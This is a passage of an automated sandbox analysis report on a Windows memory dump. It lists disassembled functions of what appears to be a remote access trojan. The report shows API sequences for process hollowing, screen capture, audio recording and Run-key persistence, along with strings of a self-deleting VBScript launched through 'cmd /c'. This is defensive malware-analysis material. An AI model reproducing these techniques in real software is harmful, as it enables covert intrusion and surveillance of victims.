                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                        • String ID:
                                        • API String ID: 1663032902-0
                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                        Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale_abort_free
                                        • String ID:
                                        • API String ID: 2692324296-0
                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                        Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                        • String ID:
                                        • API String ID: 1272433827-0
                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                        Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                        Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                        • Instruction Fuzzy Hash:
                                        Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                        • DeleteDC.GDI32(?), ref: 0041917C
                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                        • DeleteDC.GDI32(?), ref: 00419258
                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 479521175-865373369
                                        • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                        • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                        Function 004180EF Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                        • GetLastError.KERNEL32 ref: 0041847A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                        • API String ID: 4188446516-108836778
                                        • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                        • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                        Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                          • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-332907002
                                        • Opcode ID: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                        • Opcode Fuzzy Hash: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                        Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                        • ExitProcess.KERNEL32 ref: 0040D419
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-2557013105
                                        • Opcode ID: c3842cba8d0c14501c44a6e52c89837f2edaa2b41ff56417f6b5a357710c655d
                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                        • Opcode Fuzzy Hash: c3842cba8d0c14501c44a6e52c89837f2edaa2b41ff56417f6b5a357710c655d
                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                        Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                          • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                        • API String ID: 2649220323-436679193
                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                        Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                        • SetEvent.KERNEL32 ref: 0041B219
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                        • API String ID: 738084811-2094122233
                                        • Opcode ID: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                        • Opcode Fuzzy Hash: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                        Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                        • API String ID: 1646373207-4283035339
                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                        Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 0040CE07
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                        • _wcslen.LIBCMT ref: 0040CEE6
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CF84
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                        • _wcslen.LIBCMT ref: 0040CFC6
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                        • ExitProcess.KERNEL32 ref: 0040D062
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
